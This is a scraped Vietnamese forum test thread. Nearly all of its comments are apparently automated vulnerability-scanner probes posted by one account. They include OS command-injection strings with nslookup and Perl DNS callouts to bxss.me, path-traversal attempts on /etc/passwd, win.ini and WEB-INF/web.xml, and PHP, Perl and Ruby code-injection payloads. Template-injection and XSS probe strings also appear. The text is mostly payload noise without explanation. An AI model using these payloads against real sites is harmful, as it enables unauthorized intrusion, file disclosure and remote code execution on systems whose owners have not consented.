ducngochd bắt đầu chủ đề từ 2 năm trước

@Test ·


Teststset tes Test

dsafdasf   sa

Viết câu trả lời

Drop Images

2 Bình luận

iamviet avatar

fff

phqghume avatar
phqghume avatar

xpM2speB

phqghume avatar
phqghume avatar

response.write(9513125*9200281)

phqghume avatar
phqghume avatar

'+response.write(9513125*9200281)+'

phqghume avatar

"+response.write(9513125*9200281)+"

phqghume avatar
phqghume avatar

echo hlhcll$()\ qxazae\nz^xyu||a #' &echo hlhcll$()\ qxazae\nz^xyu||a #|" &echo hlhcll$()\ qxazae\nz^xyu||a #

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../etc/passwd

phqghume avatar
phqghume avatar

&echo gcvjal$()\ ftejdb\nz^xyu||a #' &echo gcvjal$()\ ftejdb\nz^xyu||a #|" &echo gcvjal$()\ ftejdb\nz^xyu||a #

phqghume avatar

../../../../../../../../../../../../../../windows/win.ini

phqghume avatar

|echo rttdpa$()\ btvulp\nz^xyu||a #' |echo rttdpa$()\ btvulp\nz^xyu||a #|" |echo rttdpa$()\ btvulp\nz^xyu||a #

phqghume avatar

../../../../../../../../../../../../../../../proc/version

phqghume avatar

(nslookup hitjzhfjwispk053ed.bxss.me||perl -e "gethostbyname('hitjzhfjwispk053ed.bxss.me')")

phqghume avatar
phqghume avatar
phqghume avatar

$(nslookup hithscmmgjfweec01b.bxss.me||perl -e "gethostbyname('hithscmmgjfweec01b.bxss.me')")

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

phqghume avatar
phqghume avatar
phqghume avatar

&(nslookup hitpsamscdtdy4258d.bxss.me||perl -e "gethostbyname('hitpsamscdtdy4258d.bxss.me')")&'\"0&(nslookup hitpsamscdtdy4258d.bxss.me||perl -e "gethostbyname('hitpsamscdtdy4258d.bxss.me')")&'

phqghume avatar

../../../../../../../../../../etc/passwd.vn/thanh-vien/iamviet) :

phqghume avatar
phqghume avatar

|(nslookup hittyyscmjmnd6abb1.bxss.me||perl -e "gethostbyname('hittyyscmjmnd6abb1.bxss.me')")

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.vn/thanh-vien/iamviet) :

phqghume avatar

(nslookup hitpeazhbaqgh4a589.bxss.me||perl -e "gethostbyname('hitpeazhbaqgh4a589.bxss.me')")

phqghume avatar

/../..//../..//../..//../..//../..//etc/passwd.vn/thanh-vien/iamviet) :

phqghume avatar

;(nslookup hituewoolpyps223db.bxss.me||perl -e "gethostbyname('hituewoolpyps223db.bxss.me')")|(nslookup hituewoolpyps223db.bxss.me||perl -e "gethostbyname('hituewoolpyps223db.bxss.me')")&(nslookup hituewoolpyps223db.bxss.me||perl -e "gethostbyname('hituewoolpyps223db.bxss.me')")

phqghume avatar
phqghume avatar

${9999826+9999571}

phqghume avatar

.\./.\./.\./.\./.\./.\./etc/passwd

phqghume avatar
phqghume avatar
phqghume avatar

/etc/passwd

phqghume avatar

12345'"\'\");|]*{ <>

phqghume avatar
phqghume avatar
phqghume avatar

%2fetc%2fpasswd

phqghume avatar
phqghume avatar
phqghume avatar

/.././.././.././.././.././.././.././../etc/./passwd%00

phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

phqghume avatar
phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

phqghume avatar
phqghume avatar

@iamviet :e@iamviet : &n978778=v961078

phqghume avatar
phqghume avatar

../././../././../././../././../././../././../././../././../././../././etc/passwd

phqghume avatar
phqghume avatar
phqghume avatar

..

phqghume avatar
phqghume avatar

)

phqghume avatar

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

phqghume avatar
phqghume avatar

!(()&&!|||

phqghume avatar

file:///etc/passwd

phqghume avatar
phqghume avatar

^(#$!@#$)(()))**

phqghume avatar

'.gethostbyname(lc('hitmb'.'rsakjgnn04475.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(69).chr(111).chr(73).'

phqghume avatar

/../../../../../../../etc/passwd

phqghume avatar

1some_inexistent_file_with_long_name.vn/thanh-vien/iamviet) :

phqghume avatar
phqghume avatar

".gethostbyname(lc("hitwu"."vqoqlldn14c3a.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(87).chr(118).chr(72)."

phqghume avatar

/WEB-INF/web.xml

phqghume avatar
phqghume avatar

C:\WINDOWS\system32\drivers\etc\hosts

phqghume avatar
phqghume avatar

../../../../../../../../../../windows/win.ini.vn/thanh-vien/iamviet) :

phqghume avatar

bxss.me

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

/../../../../../../../../../../boot.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar

';print(md5(31337));$a='

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar

";print(md5(31337));$a="

phqghume avatar
phqghume avatar
phqghume avatar

${@print(md5(31337))}

phqghume avatar

/.\./.\./.\./.\./.\./.\./windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar

${@print(md5(31337))}\

phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar

'.print(md5(31337)).'

phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

phqghume avatar

bxss.me/t/xss.html?%00

phqghume avatar
phqghume avatar
phqghume avatar

"+"A".concat(70-3).concat(22*4).concat(107).concat(90).concat(102).concat(88)+(require"socket" Socket.gethostbyname("hitcd"+"qlfwzpqyb6aae.bxss.me.")[3].to_s)+"

phqghume avatar

unexisting/../../../../../../../../../../windows/win.ini....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\

phqghume avatar
phqghume avatar
phqghume avatar

'+'A'.concat(70-3).concat(22*4).concat(110).concat(77).concat(113).concat(68)+(require'socket' Socket.gethostbyname('hitgs'+'doqgxsea8d0bf.bxss.me.')[3].to_s)+'

phqghume avatar

WEB-INF/web.xml

phqghume avatar
phqghume avatar
phqghume avatar

WEB-INF\web.xml

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar

/xfs.bxss.me

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar

956031

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

'"

phqghume avatar

tra-loi-comment/.

phqghume avatar
phqghume avatar
phqghume avatar